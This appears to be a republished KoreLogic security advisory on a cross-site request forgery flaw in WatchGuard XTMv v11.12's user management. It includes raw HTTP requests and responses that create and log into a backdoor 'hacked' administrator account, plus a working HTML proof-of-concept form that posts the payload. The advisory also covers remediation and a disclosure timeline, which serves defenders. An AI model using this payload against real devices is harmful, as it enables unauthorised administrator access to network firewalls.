扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 |
<!-- KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery Title: WatchGuard XTMv User Management Cross-Site Request Forgery Advisory ID: KL-001-2017-004 Publication Date: 2017.03.10 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt 1. Vulnerability Details Affected Vendor: WatchGuard Affected Product: XTMv Affected Version: v11.12 Build 516911 Platform: Embedded Linux CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF) Impact: Privileged Access Attack vector: HTTP 2. Vulnerability Description Lack of CSRF protection in the Add User functionality of the XTMv management portal can be leveraged to create arbitrary administrator-level accounts. 3. Technical Description As observed below, no CSRF token is in use when adding a new user to the management portal. POST /put_data/ HTTP/1.1 Host: 1.3.3.7:8080 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 365 Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287 DNT: 1 Connection: close {"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]} The HTTP response indicates that the changes were successful. HTTP/1.1 200 OK X-Frame-Options: SAMEORIGIN Content-Length: 68 Expires: Sun, 28 Jan 2007 00:00:00 GMT Vary: Accept-Encoding Server: CherryPy/3.6.0 Pragma: no-cache Cache-Control: no-cache, must-revalidate Date: Sat, 10 Dec 2016 18:08:22 GMT Content-Type: application/json Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly; Path=/; secure Connection: close {"status": true, "message": ["The changes were saved successfully"]} Now, the newly created backdoor account can be accessed. POST /agent/login HTTP/1.1 Host: 1.3.3.7:8080 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: text/xml X-Requested-With: XMLHttpRequest Content-Length: 414 Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53 DNT: 1 Connection: close <methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall> The response below shows the application issuing an authenticated session cookie. HTTP/1.1 200 OK X-Frame-Options: SAMEORIGIN Content-type: text/xml Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly Connection: close Date: Sat, 10 Dec 2016 19:55:26 GMT Server: none Content-Length: 751 <?xml version="1.0"?> <methodResponse> <params> <param> <value> <struct> <member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member> <member><name>response</name><value></value></member> <member> <name>readwrite</name> <value><struct> <member><name>privilege</name><value>2</value></member> <member><name>peer_sid</name><value>0</value></member> <member><name>peer_name</name><value>error</value></member> <member><name>peer_ip</name><value>0.0.0.0</value></member> </struct></value> </member> </struct> </value> </param> </params> </methodResponse> 4. Mitigation and Remediation Recommendation The vendor has remediated this vulnerability in WatchGuard XTMv v11.12.1. Release notes and upgrade instructions are available at: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin. 6. Disclosure Timeline 2017.01.13 - KoreLogic sends vulnerability report and PoC to WatchGuard. 2017.01.13 - WatchGuard acknowledges receipt of report. 2017.01.23 - WatchGuard informs KoreLogic that the vulnerability will be addressed in the forthcoming v11.12.1 firmware, scheduled for general availability on or around 2017.02.21. 2017.02.22 - WatchGuard releases v11.12.1. 2017.03.10 - KoreLogic public disclosure. 7. Proof of Concept --> <html> <body> <form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain"> <input type="hidden" name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}" value="" /> <input type="submit" value="Trigger" /> </form> </body> </html> <!-- The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt --> |
体验盒子
